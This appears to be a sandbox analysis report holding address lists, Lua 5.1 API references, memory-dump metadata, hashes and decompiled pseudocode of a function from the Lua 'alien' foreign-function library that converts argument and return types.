0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_type.LUA5.1 ref: 00A2238D
lua_isstring.LUA5.1 ref: 00A223AB
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_tolstring.LUA5.1(?,?,00000000), ref: 00A223BB

Part of subcall function 00A24130: __alloca_probe_16.LIBCMT ref: 00A24160

lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$__alloca_probe_16lua_isstring.lua_pushnil.lua_tolstring.lua_type.
String ID:
API String ID: 2112894905-0
Opcode ID: 6fccbf3baf34248300a0f4e44bd15fd017870a0ded32624da399b2759daf7416
Instruction ID: c0a44b757936b22e7d582d9ec1ea56e3c26f29653f0b44e4deb0fdbda1bacc63
Opcode Fuzzy Hash: 6fccbf3baf34248300a0f4e44bd15fd017870a0ded32624da399b2759daf7416
Instruction Fuzzy Hash: CEC183B5D04129ABCB04EF98FE81DEEBBB8FF49300F144168F441B7246DA399A15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A22423, Relevance: 25.8, APIs: 17, Instructions: 327
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A22423(void* __edi, long long __fp0) {
				signed int* __ebx;
				void* __esi;
				intOrPtr* _t224;
				signed int _t226;
				char* _t227;
				signed int _t228;
				char* _t229;
				signed int _t240;
				void* _t247;
				void* _t249;
				intOrPtr _t251;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t273;
				signed int _t274;
				void* _t275;
				void* _t277;
				signed int _t278;
				void* _t280;
				intOrPtr* _t281;
				void* _t282;
				long long _t292;

				L0:
				while(1) {
					L0:
					_t292 = __fp0;
					_t273 = __edi;
					_push(_t247);
					L00A23F68();
					asm("fnstcw word [ebp-0xe]");
					 *(_t278 - 0x18) =  *(_t278 - 0xe) & 0x0000ffff | 0x00000c00;
					_t281 = _t280 + 8;
					asm("fldcw word [ebp-0x18]");
					asm("fistp qword [ebp-0x1c]");
					 *((intOrPtr*)( *((intOrPtr*)(_t278 - 0x28)))) =  *((intOrPtr*)(_t278 - 0x1c));
					asm("fldcw word [ebp-0xe]");
					E00A246A0(4);
					_t251 =  *((intOrPtr*)(_t278 - 0x28));
					_t224 = _t281;
					 *_t224 = _t251;
					 *((intOrPtr*)( *((intOrPtr*)(_t278 - 0xc)) + __edi)) = _t224;
					 *((intOrPtr*)(_t278 - 0x28)) = _t251 + 4;
					while(1) {
						L36:
						 *((intOrPtr*)(_t278 - 0xc)) =  *((intOrPtr*)(_t278 - 0xc)) + 4;
						_t247 = _t247 + 1;
						_t116 = _t278 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t278 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t253 =  *((intOrPtr*)(_t278 - 0x14));
						_t264 =  *((intOrPtr*)(_t253 + 0x30));
						_t226 =  *( *((intOrPtr*)(_t278 - 0xc)) +  *((intOrPtr*)(_t253 + 0x30)));
						if(_t226 > 0x11) {
							L33:
							_t227 =  *(_t253 + 8);
							if(_t227 == 0) {
								_t227 = "anonymous";
							}
							_push(_t227);
							_push(_t247);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t276);
							L00A23F26();
							_t281 = _t281 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t226 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t245 = E00A246A0(4);
								 *((intOrPtr*)(_t278 - 8)) = _t281;
								_push(_t247);
								_push(_t276);
								L00A23F68();
								_t281 = _t281 + 8;
								_t246 = E00A245C0(_t245, _t292);
								_t263 =  *((intOrPtr*)(_t278 - 8));
								_t264 =  *((intOrPtr*)(_t278 - 0xc));
								 *_t263 = _t246;
								 *((intOrPtr*)( *((intOrPtr*)(_t278 - 0xc)) + _t273)) = _t263;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L13:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L25:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx =  &(__ecx[1]);
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								goto L0;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx =  &(__ecx[0]);
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx =  &(__ecx[2]);
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L20:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t254 =  *((intOrPtr*)(_t278 - 0x14));
					 *((intOrPtr*)(_t278 - 0x3c)) = 0;
					_t228 =  *(_t254 + 0xc);
					if(_t228 > 0xc) {
						L58:
						_t229 =  *(_t254 + 8);
						if(_t229 == 0) {
							_t229 = "anonymous";
						}
						_push(_t229);
						_push("alien: unknown return type (function %s)");
						_push(_t276);
						L00A23F26();
						L61:
						_t282 = _t281 + 0xc;
						L62:
						 *((intOrPtr*)(_t278 - 0x24)) =  *((intOrPtr*)(_t278 - 0x24)) +  ~( *(_t278 - 0x48)) * 4;
						 *((intOrPtr*)(_t278 - 0x2c)) =  *((intOrPtr*)(_t278 - 0x2c)) -  *((intOrPtr*)(_t278 - 0x30));
						_t274 = 0;
						 *((intOrPtr*)(_t278 - 0x28)) =  *((intOrPtr*)(_t278 - 0x28)) +  ~( *(_t278 - 0x38)) * 4;
						if( *((intOrPtr*)(_t278 - 0x44)) <= 0) {
							L72:
							_pop(_t275);
							_pop(_t277);
							_pop(_t249);
							return E00A245A4( *((intOrPtr*)(_t278 - 0x30)) +  *((intOrPtr*)(_t278 - 0x34)) +  *(_t278 - 0x38) +  *(_t278 - 0x48) + 1, _t249,  *(_t278 - 4) ^ _t278,  *(_t278 - 0x48), _t275, _t277);
						} else {
							goto L63;
						}
						do {
							L63:
							_t240 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t278 - 0x14)) + 0x30)) + _t274 * 4)) + 0xfffffff3;
							if(_t240 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t240 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t285 = _t282 - 8;
									 *_t285 = _t292;
									_push(_t276);
									L00A23F80();
									_t282 = _t285 + 0xc;
									 *((intOrPtr*)(_t278 - 0x24)) =  *((intOrPtr*)(_t278 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  &(( *(__ebp - 0x2c))[0]);
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx =  &(__ebx[2]);
									goto L71;
							}
							L71:
							_t274 = _t274 + 1;
						} while (_t274 <  *((intOrPtr*)(_t278 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t228 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t247, _t264, _t273, _t292,  *((intOrPtr*)(_t278 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t278 - 0x14)) + 4)), 0, _t273);
							_push(_t276);
							L00A23F74();
							_t282 = _t281 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a22423
0x00a22423
0x00a22423
0x00a22423
0x00a22423
0x00a22423
0x00a22425
0x00a2242a
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22448
0x00a2244f
0x00a22452
0x00a22457
0x00a2245d
0x00a2245f
0x00a22464
0x00a22467
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
